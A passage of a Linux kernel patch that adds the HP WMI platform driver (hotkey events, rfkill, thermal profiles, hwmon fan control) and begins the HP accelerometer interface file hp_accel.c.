++		rfkill_set_states(rfkill2[i].rfkill,
++				  IS_SWBLOCKED(devstate->power),
++				  IS_HWBLOCKED(devstate->power));
++	}
++
++	return 0;
++}
++
++static ssize_t display_show(struct device *dev, struct device_attribute *attr,
++			    char *buf)
++{
++	int value = hp_wmi_read_int(HPWMI_DISPLAY_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t hddtemp_show(struct device *dev, struct device_attribute *attr,
++			    char *buf)
++{
++	int value = hp_wmi_read_int(HPWMI_HDDTEMP_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t als_show(struct device *dev, struct device_attribute *attr,
++			char *buf)
++{
++	int value = hp_wmi_read_int(HPWMI_ALS_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t dock_show(struct device *dev, struct device_attribute *attr,
++			 char *buf)
++{
++	int value = hp_wmi_get_dock_state();
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t tablet_show(struct device *dev, struct device_attribute *attr,
++			   char *buf)
++{
++	int value = hp_wmi_get_tablet_mode();
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t postcode_show(struct device *dev, struct device_attribute *attr,
++			     char *buf)
++{
++	/* Get the POST error code of previous boot failure. */
++	int value = hp_wmi_read_int(HPWMI_POSTCODEERROR_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "0x%x\n", value);
++}
++
++static ssize_t als_store(struct device *dev, struct device_attribute *attr,
++			 const char *buf, size_t count)
++{
++	u32 tmp;
++	int ret;
++
++	ret = kstrtou32(buf, 10, &tmp);
++	if (ret)
++		return ret;
++
++	ret = hp_wmi_perform_query(HPWMI_ALS_QUERY, HPWMI_WRITE, &tmp,
++				       sizeof(tmp), 0);
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return count;
++}
++
++static ssize_t postcode_store(struct device *dev, struct device_attribute *attr,
++			      const char *buf, size_t count)
++{
++	u32 tmp = 1;
++	bool clear;
++	int ret;
++
++	ret = kstrtobool(buf, &clear);
++	if (ret)
++		return ret;
++
++	if (clear == false)
++		return -EINVAL;
++
++	/* Clear the POST error code. It is kept until cleared. */
++	ret = hp_wmi_perform_query(HPWMI_POSTCODEERROR_QUERY, HPWMI_WRITE, &tmp,
++				       sizeof(tmp), 0);
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return count;
++}
++
++static DEVICE_ATTR_RO(display);
++static DEVICE_ATTR_RO(hddtemp);
++static DEVICE_ATTR_RW(als);
++static DEVICE_ATTR_RO(dock);
++static DEVICE_ATTR_RO(tablet);
++static DEVICE_ATTR_RW(postcode);
++
++static struct attribute *hp_wmi_attrs[] = {
++	&dev_attr_display.attr,
++	&dev_attr_hddtemp.attr,
++	&dev_attr_als.attr,
++	&dev_attr_dock.attr,
++	&dev_attr_tablet.attr,
++	&dev_attr_postcode.attr,
++	NULL,
++};
++ATTRIBUTE_GROUPS(hp_wmi);
++
++static void hp_wmi_notify(u32 value, void *context)
++{
++	struct acpi_buffer response = { ACPI_ALLOCATE_BUFFER, NULL };
++	u32 event_id, event_data;
++	union acpi_object *obj;
++	acpi_status status;
++	u32 *location;
++	int key_code;
++
++	status = wmi_get_event_data(value, &response);
++	if (status != AE_OK) {
++		pr_info("bad event status 0x%x\n", status);
++		return;
++	}
++
++	obj = (union acpi_object *)response.pointer;
++
++	if (!obj)
++		return;
++	if (obj->type != ACPI_TYPE_BUFFER) {
++		pr_info("Unknown response received %d\n", obj->type);
++		kfree(obj);
++		return;
++	}
++
++	/*
++	 * Depending on the ACPI version, the concatenation of id and event
++	 * data inside the _WED function will result in an 8- or 16-byte buffer.
++	 */
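++	/*
++	 * Layout implied by the length checks below: event_id sits at
++	 * offset 0 in both cases, while event_data sits at offset 4 in
++	 * the 8-byte buffer and at offset 8 in the 16-byte one.
++	 */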
++	location = (u32 *)obj->buffer.pointer;
++	if (obj->buffer.length == 8) {
++		event_id = *location;
++		event_data = *(location + 1);
++	} else if (obj->buffer.length == 16) {
++		event_id = *location;
++		event_data = *(location + 2);
++	} else {
++		pr_info("Unknown buffer length %d\n", obj->buffer.length);
++		kfree(obj);
++		return;
++	}
++	kfree(obj);
++
++	switch (event_id) {
++	case HPWMI_DOCK_EVENT:
++		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_DOCK,
++					    hp_wmi_get_dock_state());
++		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
++					    hp_wmi_get_tablet_mode());
++		input_sync(hp_wmi_input_dev);
++		break;
++	case HPWMI_PARK_HDD:
++		break;
++	case HPWMI_SMART_ADAPTER:
++		break;
++	case HPWMI_BEZEL_BUTTON:
++	case HPWMI_OMEN_KEY:
++		key_code = hp_wmi_read_int(HPWMI_HOTKEY_QUERY);
++		if (key_code < 0)
++			break;
++
++		if (!sparse_keymap_report_event(hp_wmi_input_dev,
++						key_code, 1, true))
++			pr_info("Unknown key code - 0x%x\n", key_code);
++		break;
++	case HPWMI_WIRELESS:
++		if (rfkill2_count) {
++			hp_wmi_rfkill2_refresh();
++			break;
++		}
++
++		if (wifi_rfkill)
++			rfkill_set_states(wifi_rfkill,
++					  hp_wmi_get_sw_state(HPWMI_WIFI),
++					  hp_wmi_get_hw_state(HPWMI_WIFI));
++		if (bluetooth_rfkill)
++			rfkill_set_states(bluetooth_rfkill,
++					  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
++					  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
++		if (wwan_rfkill)
++			rfkill_set_states(wwan_rfkill,
++					  hp_wmi_get_sw_state(HPWMI_WWAN),
++					  hp_wmi_get_hw_state(HPWMI_WWAN));
++		break;
++	case HPWMI_CPU_BATTERY_THROTTLE:
++		pr_info("Unimplemented CPU throttle because of 3 Cell battery event detected\n");
++		break;
++	case HPWMI_LOCK_SWITCH:
++		break;
++	case HPWMI_LID_SWITCH:
++		break;
++	case HPWMI_SCREEN_ROTATION:
++		break;
++	case HPWMI_COOLSENSE_SYSTEM_MOBILE:
++		break;
++	case HPWMI_COOLSENSE_SYSTEM_HOT:
++		break;
++	case HPWMI_PROXIMITY_SENSOR:
++		break;
++	case HPWMI_BACKLIT_KB_BRIGHTNESS:
++		break;
++	case HPWMI_PEAKSHIFT_PERIOD:
++		break;
++	case HPWMI_BATTERY_CHARGE_PERIOD:
++		break;
++	case HPWMI_SANITIZATION_MODE:
++		break;
++	case HPWMI_SMART_EXPERIENCE_APP:
++		break;
++	default:
++		pr_info("Unknown event_id - %d - 0x%x\n", event_id, event_data);
++		break;
++	}
++}
++
++static int __init hp_wmi_input_setup(void)
++{
++	acpi_status status;
++	int err, val;
++
++	hp_wmi_input_dev = input_allocate_device();
++	if (!hp_wmi_input_dev)
++		return -ENOMEM;
++
++	hp_wmi_input_dev->name = "HP WMI hotkeys";
++	hp_wmi_input_dev->phys = "wmi/input0";
++	hp_wmi_input_dev->id.bustype = BUS_HOST;
++
++	__set_bit(EV_SW, hp_wmi_input_dev->evbit);
++
++	/* Dock */
++	val = hp_wmi_get_dock_state();
++	if (val >= 0) {
++		__set_bit(SW_DOCK, hp_wmi_input_dev->swbit);
++		input_report_switch(hp_wmi_input_dev, SW_DOCK, val);
++	}
++
++	/* Tablet mode */
++	val = hp_wmi_get_tablet_mode();
++	if (val >= 0) {
++		__set_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit);
++		input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE, val);
++	}
++
++	err = sparse_keymap_setup(hp_wmi_input_dev, hp_wmi_keymap, NULL);
++	if (err)
++		goto err_free_dev;
++
++	/* Set initial hardware state */
++	input_sync(hp_wmi_input_dev);
++
++	if (!hp_wmi_bios_2009_later() && hp_wmi_bios_2008_later())
++		hp_wmi_enable_hotkeys();
++
++	status = wmi_install_notify_handler(HPWMI_EVENT_GUID, hp_wmi_notify, NULL);
++	if (ACPI_FAILURE(status)) {
++		err = -EIO;
++		goto err_free_dev;
++	}
++
++	err = input_register_device(hp_wmi_input_dev);
++	if (err)
++		goto err_uninstall_notifier;
++
++	return 0;
++
++ err_uninstall_notifier:
++	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
++ err_free_dev:
++	input_free_device(hp_wmi_input_dev);
++	return err;
++}
++
++static void hp_wmi_input_destroy(void)
++{
++	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
++	input_unregister_device(hp_wmi_input_dev);
++}
++
++static int __init hp_wmi_rfkill_setup(struct platform_device *device)
++{
++	int err, wireless;
++
++	wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
++	if (wireless < 0)
++		return wireless;
++
++	err = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE, &wireless,
++				   sizeof(wireless), 0);
++	if (err)
++		return err;
++
++	if (wireless & 0x1) {
++		wifi_rfkill = rfkill_alloc("hp-wifi", &device->dev,
++					   RFKILL_TYPE_WLAN,
++					   &hp_wmi_rfkill_ops,
++					   (void *) HPWMI_WIFI);
++		if (!wifi_rfkill)
++			return -ENOMEM;
++		rfkill_init_sw_state(wifi_rfkill,
++				     hp_wmi_get_sw_state(HPWMI_WIFI));
++		rfkill_set_hw_state(wifi_rfkill,
++				    hp_wmi_get_hw_state(HPWMI_WIFI));
++		err = rfkill_register(wifi_rfkill);
++		if (err)
++			goto register_wifi_error;
++	}
++
++	if (wireless & 0x2) {
++		bluetooth_rfkill = rfkill_alloc("hp-bluetooth", &device->dev,
++						RFKILL_TYPE_BLUETOOTH,
++						&hp_wmi_rfkill_ops,
++						(void *) HPWMI_BLUETOOTH);
++		if (!bluetooth_rfkill) {
++			err = -ENOMEM;
++			goto register_bluetooth_error;
++		}
++		rfkill_init_sw_state(bluetooth_rfkill,
++				     hp_wmi_get_sw_state(HPWMI_BLUETOOTH));
++		rfkill_set_hw_state(bluetooth_rfkill,
++				    hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
++		err = rfkill_register(bluetooth_rfkill);
++		if (err)
++			goto register_bluetooth_error;
++	}
++
++	if (wireless & 0x4) {
++		wwan_rfkill = rfkill_alloc("hp-wwan", &device->dev,
++					   RFKILL_TYPE_WWAN,
++					   &hp_wmi_rfkill_ops,
++					   (void *) HPWMI_WWAN);
++		if (!wwan_rfkill) {
++			err = -ENOMEM;
++			goto register_wwan_error;
++		}
++		rfkill_init_sw_state(wwan_rfkill,
++				     hp_wmi_get_sw_state(HPWMI_WWAN));
++		rfkill_set_hw_state(wwan_rfkill,
++				    hp_wmi_get_hw_state(HPWMI_WWAN));
++		err = rfkill_register(wwan_rfkill);
++		if (err)
++			goto register_wwan_error;
++	}
++
++	return 0;
++
++register_wwan_error:
++	rfkill_destroy(wwan_rfkill);
++	wwan_rfkill = NULL;
++	if (bluetooth_rfkill)
++		rfkill_unregister(bluetooth_rfkill);
++register_bluetooth_error:
++	rfkill_destroy(bluetooth_rfkill);
++	bluetooth_rfkill = NULL;
++	if (wifi_rfkill)
++		rfkill_unregister(wifi_rfkill);
++register_wifi_error:
++	rfkill_destroy(wifi_rfkill);
++	wifi_rfkill = NULL;
++	return err;
++}
++
++static int __init hp_wmi_rfkill2_setup(struct platform_device *device)
++{
++	struct bios_rfkill2_state state;
++	int err, i;
++
++	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
++				   zero_if_sup(state), sizeof(state));
++	if (err)
++		return err < 0 ? err : -EINVAL;
++
++	if (state.count > HPWMI_MAX_RFKILL2_DEVICES) {
++		pr_warn("unable to parse 0x1b query output\n");
++		return -EINVAL;
++	}
++
++	for (i = 0; i < state.count; i++) {
++		struct rfkill *rfkill;
++		enum rfkill_type type;
++		char *name;
++
++		switch (state.device[i].radio_type) {
++		case HPWMI_WIFI:
++			type = RFKILL_TYPE_WLAN;
++			name = "hp-wifi";
++			break;
++		case HPWMI_BLUETOOTH:
++			type = RFKILL_TYPE_BLUETOOTH;
++			name = "hp-bluetooth";
++			break;
++		case HPWMI_WWAN:
++			type = RFKILL_TYPE_WWAN;
++			name = "hp-wwan";
++			break;
++		case HPWMI_GPS:
++			type = RFKILL_TYPE_GPS;
++			name = "hp-gps";
++			break;
++		default:
++			pr_warn("unknown device type 0x%x\n",
++				state.device[i].radio_type);
++			continue;
++		}
++
++		if (!state.device[i].vendor_id) {
++			pr_warn("zero device %d while %d reported\n",
++				i, state.count);
++			continue;
++		}
++
++		rfkill = rfkill_alloc(name, &device->dev, type,
++				      &hp_wmi_rfkill2_ops, (void *)(long)i);
++		if (!rfkill) {
++			err = -ENOMEM;
++			goto fail;
++		}
++
++		rfkill2[rfkill2_count].id = state.device[i].rfkill_id;
++		rfkill2[rfkill2_count].num = i;
++		rfkill2[rfkill2_count].rfkill = rfkill;
++
++		rfkill_init_sw_state(rfkill,
++				     IS_SWBLOCKED(state.device[i].power));
++		rfkill_set_hw_state(rfkill,
++				    IS_HWBLOCKED(state.device[i].power));
++
++		if (!(state.device[i].power & HPWMI_POWER_BIOS))
++			pr_info("device %s blocked by BIOS\n", name);
++
++		err = rfkill_register(rfkill);
++		if (err) {
++			rfkill_destroy(rfkill);
++			goto fail;
++		}
++
++		rfkill2_count++;
++	}
++
++	return 0;
++fail:
++	for (; rfkill2_count > 0; rfkill2_count--) {
++		rfkill_unregister(rfkill2[rfkill2_count - 1].rfkill);
++		rfkill_destroy(rfkill2[rfkill2_count - 1].rfkill);
++	}
++	return err;
++}
++
++static int platform_profile_omen_get(struct platform_profile_handler *pprof,
++				     enum platform_profile_option *profile)
++{
++	int tp;
++
++	tp = omen_thermal_profile_get();
++	if (tp < 0)
++		return tp;
++
++	switch (tp) {
++	case HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE:
++	case HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE:
++		*profile = PLATFORM_PROFILE_PERFORMANCE;
++		break;
++	case HP_OMEN_V0_THERMAL_PROFILE_DEFAULT:
++	case HP_OMEN_V1_THERMAL_PROFILE_DEFAULT:
++		*profile = PLATFORM_PROFILE_BALANCED;
++		break;
++	case HP_OMEN_V0_THERMAL_PROFILE_COOL:
++	case HP_OMEN_V1_THERMAL_PROFILE_COOL:
++		*profile = PLATFORM_PROFILE_COOL;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int platform_profile_omen_set(struct platform_profile_handler *pprof,
++				     enum platform_profile_option profile)
++{
++	int err, tp, tp_version;
++
++	tp_version = omen_get_thermal_policy_version();
++
++	if (tp_version < 0 || tp_version > 1)
++		return -EOPNOTSUPP;
++
++	switch (profile) {
++	case PLATFORM_PROFILE_PERFORMANCE:
++		if (tp_version == 0)
++			tp = HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE;
++		else
++			tp = HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE;
++		break;
++	case PLATFORM_PROFILE_BALANCED:
++		if (tp_version == 0)
++			tp = HP_OMEN_V0_THERMAL_PROFILE_DEFAULT;
++		else
++			tp = HP_OMEN_V1_THERMAL_PROFILE_DEFAULT;
++		break;
++	case PLATFORM_PROFILE_COOL:
++		if (tp_version == 0)
++			tp = HP_OMEN_V0_THERMAL_PROFILE_COOL;
++		else
++			tp = HP_OMEN_V1_THERMAL_PROFILE_COOL;
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
++	err = omen_thermal_profile_set(tp);
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++
++static int thermal_profile_get(void)
++{
++	return hp_wmi_read_int(HPWMI_THERMAL_PROFILE_QUERY);
++}
++
++static int thermal_profile_set(int thermal_profile)
++{
++	return hp_wmi_perform_query(HPWMI_THERMAL_PROFILE_QUERY, HPWMI_WRITE, &thermal_profile,
++							   sizeof(thermal_profile), 0);
++}
++
++static int hp_wmi_platform_profile_get(struct platform_profile_handler *pprof,
++					enum platform_profile_option *profile)
++{
++	int tp;
++
++	tp = thermal_profile_get();
++	if (tp < 0)
++		return tp;
++
++	switch (tp) {
++	case HP_THERMAL_PROFILE_PERFORMANCE:
++		*profile =  PLATFORM_PROFILE_PERFORMANCE;
++		break;
++	case HP_THERMAL_PROFILE_DEFAULT:
++		*profile =  PLATFORM_PROFILE_BALANCED;
++		break;
++	case HP_THERMAL_PROFILE_COOL:
++		*profile =  PLATFORM_PROFILE_COOL;
++		break;
++	case HP_THERMAL_PROFILE_QUIET:
++		*profile = PLATFORM_PROFILE_QUIET;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int hp_wmi_platform_profile_set(struct platform_profile_handler *pprof,
++					enum platform_profile_option profile)
++{
++	int err, tp;
++
++	switch (profile) {
++	case PLATFORM_PROFILE_PERFORMANCE:
++		tp =  HP_THERMAL_PROFILE_PERFORMANCE;
++		break;
++	case PLATFORM_PROFILE_BALANCED:
++		tp =  HP_THERMAL_PROFILE_DEFAULT;
++		break;
++	case PLATFORM_PROFILE_COOL:
++		tp =  HP_THERMAL_PROFILE_COOL;
++		break;
++	case PLATFORM_PROFILE_QUIET:
++		tp = HP_THERMAL_PROFILE_QUIET;
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
++	err = thermal_profile_set(tp);
++	if (err)
++		return err;
++
++	return 0;
++}
++
++static int thermal_profile_setup(void)
++{
++	int err, tp;
++
++	if (is_omen_thermal_profile()) {
++		tp = omen_thermal_profile_get();
++		if (tp < 0)
++			return tp;
++
++		/*
++		 * call thermal profile write command to ensure that the
++		 * firmware correctly sets the OEM variables
++		 */
++
++		err = omen_thermal_profile_set(tp);
++		if (err < 0)
++			return err;
++
++		platform_profile_handler.profile_get = platform_profile_omen_get;
++		platform_profile_handler.profile_set = platform_profile_omen_set;
++	} else {
++		tp = thermal_profile_get();
++
++		if (tp < 0)
++			return tp;
++
++		/*
++		 * call thermal profile write command to ensure that the
++		 * firmware correctly sets the OEM variables for the DPTF
++		 */
++		err = thermal_profile_set(tp);
++		if (err)
++			return err;
++
++		platform_profile_handler.profile_get = hp_wmi_platform_profile_get;
++		platform_profile_handler.profile_set = hp_wmi_platform_profile_set;
++
++		set_bit(PLATFORM_PROFILE_QUIET, platform_profile_handler.choices);
++	}
++
++	set_bit(PLATFORM_PROFILE_COOL, platform_profile_handler.choices);
++	set_bit(PLATFORM_PROFILE_BALANCED, platform_profile_handler.choices);
++	set_bit(PLATFORM_PROFILE_PERFORMANCE, platform_profile_handler.choices);
++
++	err = platform_profile_register(&platform_profile_handler);
++	if (err)
++		return err;
++
++	platform_profile_support = true;
++
++	return 0;
++}
++
++static int hp_wmi_hwmon_init(void);
++
++static int __init hp_wmi_bios_setup(struct platform_device *device)
++{
++	int err;
++	/* clear detected rfkill devices */
++	wifi_rfkill = NULL;
++	bluetooth_rfkill = NULL;
++	wwan_rfkill = NULL;
++	rfkill2_count = 0;
++
++	/*
++	 * In pre-2009 BIOSes, command 1Bh returns 0x4 to indicate that
++	 * the BIOS no longer controls the power for the wireless
++	 * devices; all features supported by this command are no
++	 * longer available.
++	 */
++	if (!hp_wmi_bios_2009_later()) {
++		if (hp_wmi_rfkill_setup(device))
++			hp_wmi_rfkill2_setup(device);
++	}
++
++	err = hp_wmi_hwmon_init();
++
++	if (err < 0)
++		return err;
++
++	thermal_profile_setup();
++
++	return 0;
++}
++
++static int __exit hp_wmi_bios_remove(struct platform_device *device)
++{
++	int i;
++
++	for (i = 0; i < rfkill2_count; i++) {
++		rfkill_unregister(rfkill2[i].rfkill);
++		rfkill_destroy(rfkill2[i].rfkill);
++	}
++
++	if (wifi_rfkill) {
++		rfkill_unregister(wifi_rfkill);
++		rfkill_destroy(wifi_rfkill);
++	}
++	if (bluetooth_rfkill) {
++		rfkill_unregister(bluetooth_rfkill);
++		rfkill_destroy(bluetooth_rfkill);
++	}
++	if (wwan_rfkill) {
++		rfkill_unregister(wwan_rfkill);
++		rfkill_destroy(wwan_rfkill);
++	}
++
++	if (platform_profile_support)
++		platform_profile_remove();
++
++	return 0;
++}
++
++static int hp_wmi_resume_handler(struct device *device)
++{
++	/*
++	 * Hardware state may have changed while suspended, so trigger
++	 * input events for the current state. As this is a switch,
++	 * the input layer will only actually pass it on if the state
++	 * changed.
++	 */
++	if (hp_wmi_input_dev) {
++		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_DOCK,
++					    hp_wmi_get_dock_state());
++		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
++					    hp_wmi_get_tablet_mode());
++		input_sync(hp_wmi_input_dev);
++	}
++
++	if (rfkill2_count)
++		hp_wmi_rfkill2_refresh();
++
++	if (wifi_rfkill)
++		rfkill_set_states(wifi_rfkill,
++				  hp_wmi_get_sw_state(HPWMI_WIFI),
++				  hp_wmi_get_hw_state(HPWMI_WIFI));
++	if (bluetooth_rfkill)
++		rfkill_set_states(bluetooth_rfkill,
++				  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
++				  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
++	if (wwan_rfkill)
++		rfkill_set_states(wwan_rfkill,
++				  hp_wmi_get_sw_state(HPWMI_WWAN),
++				  hp_wmi_get_hw_state(HPWMI_WWAN));
++
++	return 0;
++}
++
++static const struct dev_pm_ops hp_wmi_pm_ops = {
++	.resume  = hp_wmi_resume_handler,
++	.restore  = hp_wmi_resume_handler,
++};
++
++static struct platform_driver hp_wmi_driver = {
++	.driver = {
++		.name = "hp-wmi",
++		.pm = &hp_wmi_pm_ops,
++		.dev_groups = hp_wmi_groups,
++	},
++	.remove = __exit_p(hp_wmi_bios_remove),
++};
++
++static umode_t hp_wmi_hwmon_is_visible(const void *data,
++				       enum hwmon_sensor_types type,
++				       u32 attr, int channel)
++{
++	switch (type) {
++	case hwmon_pwm:
++		return 0644;
++	case hwmon_fan:
++		if (hp_wmi_get_fan_speed(channel) >= 0)
++			return 0444;
++		break;
++	default:
++		return 0;
++	}
++
++	return 0;
++}
++
++static int hp_wmi_hwmon_read(struct device *dev, enum hwmon_sensor_types type,
++			     u32 attr, int channel, long *val)
++{
++	int ret;
++
++	switch (type) {
++	case hwmon_fan:
++		ret = hp_wmi_get_fan_speed(channel);
++
++		if (ret < 0)
++			return ret;
++		*val = ret;
++		return 0;
++	case hwmon_pwm:
++		switch (hp_wmi_fan_speed_max_get()) {
++		case 0:
++			/* 0 is automatic fan, which is 2 for hwmon */
++			*val = 2;
++			return 0;
++		case 1:
++			/* 1 is max fan, which is 0
++			 * (no fan speed control) for hwmon
++			 */
++			*val = 0;
++			return 0;
++		default:
++			/* shouldn't happen */
++			return -ENODATA;
++		}
++	default:
++		return -EINVAL;
++	}
++}
++
++static int hp_wmi_hwmon_write(struct device *dev, enum hwmon_sensor_types type,
++			      u32 attr, int channel, long val)
++{
++	switch (type) {
++	case hwmon_pwm:
++		switch (val) {
++		case 0:
++			/* 0 is no fan speed control (max), which is 1 for us */
++			return hp_wmi_fan_speed_max_set(1);
++		case 2:
++			/* 2 is automatic speed control, which is 0 for us */
++			return hp_wmi_fan_speed_max_set(0);
++		default:
++			/* we don't support manual fan speed control */
++			return -EINVAL;
++		}
++	default:
++		return -EOPNOTSUPP;
++	}
++}
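++
++/*
++ * Mapping between the hwmon pwm1_enable values handled above and the
++ * firmware's max-fan flag: hwmon 2 (automatic) writes 0, hwmon 0
++ * (full speed, no control) writes 1; manual mode (1) is unsupported.
++ */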
++
++static const struct hwmon_channel_info *info[] = {
++	HWMON_CHANNEL_INFO(fan, HWMON_F_INPUT, HWMON_F_INPUT),
++	HWMON_CHANNEL_INFO(pwm, HWMON_PWM_ENABLE),
++	NULL
++};
++
++static const struct hwmon_ops ops = {
++	.is_visible = hp_wmi_hwmon_is_visible,
++	.read = hp_wmi_hwmon_read,
++	.write = hp_wmi_hwmon_write,
++};
++
++static const struct hwmon_chip_info chip_info = {
++	.ops = &ops,
++	.info = info,
++};
++
++static int hp_wmi_hwmon_init(void)
++{
++	struct device *dev = &hp_wmi_platform_dev->dev;
++	struct device *hwmon;
++
++	hwmon = devm_hwmon_device_register_with_info(dev, "hp", &hp_wmi_driver,
++						     &chip_info, NULL);
++
++	if (IS_ERR(hwmon)) {
++		dev_err(dev, "Could not register hp hwmon device\n");
++		return PTR_ERR(hwmon);
++	}
++
++	return 0;
++}
++
++static int __init hp_wmi_init(void)
++{
++	int event_capable = wmi_has_guid(HPWMI_EVENT_GUID);
++	int bios_capable = wmi_has_guid(HPWMI_BIOS_GUID);
++	int err, tmp = 0;
++
++	if (!bios_capable && !event_capable)
++		return -ENODEV;
++
++	if (hp_wmi_perform_query(HPWMI_HARDWARE_QUERY, HPWMI_READ, &tmp,
++				 sizeof(tmp), sizeof(tmp)) == HPWMI_RET_INVALID_PARAMETERS)
++		zero_insize_support = true;
++
++	if (event_capable) {
++		err = hp_wmi_input_setup();
++		if (err)
++			return err;
++	}
++
++	if (bios_capable) {
++		hp_wmi_platform_dev =
++			platform_device_register_simple("hp-wmi", PLATFORM_DEVID_NONE, NULL, 0);
++		if (IS_ERR(hp_wmi_platform_dev)) {
++			err = PTR_ERR(hp_wmi_platform_dev);
++			goto err_destroy_input;
++		}
++
++		err = platform_driver_probe(&hp_wmi_driver, hp_wmi_bios_setup);
++		if (err)
++			goto err_unregister_device;
++	}
++
++	return 0;
++
++err_unregister_device:
++	platform_device_unregister(hp_wmi_platform_dev);
++err_destroy_input:
++	if (event_capable)
++		hp_wmi_input_destroy();
++
++	return err;
++}
++module_init(hp_wmi_init);
++
++static void __exit hp_wmi_exit(void)
++{
++	if (wmi_has_guid(HPWMI_EVENT_GUID))
++		hp_wmi_input_destroy();
++
++	if (hp_wmi_platform_dev) {
++		platform_device_unregister(hp_wmi_platform_dev);
++		platform_driver_unregister(&hp_wmi_driver);
++	}
++}
++module_exit(hp_wmi_exit);
+diff --git a/drivers/platform/x86/hp/hp_accel.c b/drivers/platform/x86/hp/hp_accel.c
+new file mode 100644
+index 0000000000000..6477591747cfd
+--- /dev/null
++++ b/drivers/platform/x86/hp/hp_accel.c
+@@ -0,0 +1,387 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *  hp_accel.c - Interface between LIS3LV02DL driver and HP ACPI BIOS
++ *
++ *  Copyright (C) 2007-2008 Yan Burman
++ *  Copyright (C) 2008 Eric Piel
++ *  Copyright (C) 2008-2009 Pavel Machek
++ */
++
++#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
++
++#include <linux/kernel.h>
++#include <linux/init.h>
++#include <linux/dmi.h>
++#include <linux/module.h>
++#include <linux/types.h>
++#include <linux/platform_device.h>
++#include <linux/interrupt.h>
++#include <linux/delay.h>
++#include <linux/wait.h>
++#include <linux/poll.h>
++#include <linux/freezer.h>
++#include <linux/uaccess.h>
++#include <linux/leds.h>
++#include <linux/atomic.h>
++#include <linux/acpi.h>
++#include <linux/i8042.h>
++#include <linux/serio.h>
++#include "../../../misc/lis3lv02d/lis3lv02d.h"
++
++/* Delayed LEDs infrastructure ------------------------------------ */
++
++/* Special LED class that can defer work */
++struct delayed_led_classdev {
++	struct led_classdev led_classdev;
++	struct work_struct work;
++	enum led_brightness new_brightness;
++
++	unsigned int led;		/* For driver */
++	void (*set_brightness)(struct delayed_led_classdev *data, enum led_brightness value);
++};
++
++static inline void delayed_set_status_worker(struct work_struct *work)
++{
++	struct delayed_led_classdev *data =
++			container_of(work, struct delayed_led_classdev, work);
++
++	data->set_brightness(data, data->new_brightness);
++}
++
++static inline void delayed_sysfs_set(struct led_classdev *led_cdev,
++			      enum led_brightness brightness)
++{
++	struct delayed_led_classdev *data = container_of(led_cdev,
++			     struct delayed_led_classdev, led_classdev);
++	data->new_brightness = brightness;
++	schedule_work(&data->work);
++}
++
++/* HP-specific accelerometer driver ------------------------------------ */
++
++/* e0 25, e0 26, e0 27, e0 28 are scan codes that the accelerometer with
++ * ACPI id HPQ6000 sends through the keyboard bus */
++#define ACCEL_1 0x25
++#define ACCEL_2 0x26
++#define ACCEL_3 0x27
++#define ACCEL_4 0x28
++
++/* For automatic insertion of the module */
++static const struct acpi_device_id lis3lv02d_device_ids[] = {
++	{"HPQ0004", 0}, /* HP Mobile Data Protection System PNP */
++	{"HPQ6000", 0}, /* HP Mobile Data Protection System PNP */
++	{"HPQ6007", 0}, /* HP Mobile Data Protection System PNP */
++	{"", 0},
++};
++MODULE_DEVICE_TABLE(acpi, lis3lv02d_device_ids);
++
++/**
++ * lis3lv02d_acpi_init - initialize the device for ACPI
++ * @lis3: pointer to the device struct
++ *
++ * Returns 0 on success.
++ */
++static int lis3lv02d_acpi_init(struct lis3lv02d *lis3)
++{
++	return 0;
++}
++
++/**
++ * lis3lv02d_acpi_read - ACPI ALRD method: read a register
++ * @lis3: pointer to the device struct
++ * @reg:    the register to read
++ * @ret:    result of the operation
++ *
++ * Returns 0 on success.
++ */
++static int lis3lv02d_acpi_read(struct lis3lv02d *lis3, int reg, u8 *ret)
++{
++	struct acpi_device *dev = lis3->bus_priv;
++	union acpi_object arg0 = { ACPI_TYPE_INTEGER };
++	struct acpi_object_list args = { 1, &arg0 };
++	unsigned long long lret;
++	acpi_status status;
++
++	arg0.integer.value = reg;
++
++	status = acpi_evaluate_integer(dev->handle, "ALRD", &args, &lret);
++	if (ACPI_FAILURE(status))
++		return -EINVAL;
++	*ret = lret;
++	return 0;
++}
++
++/**
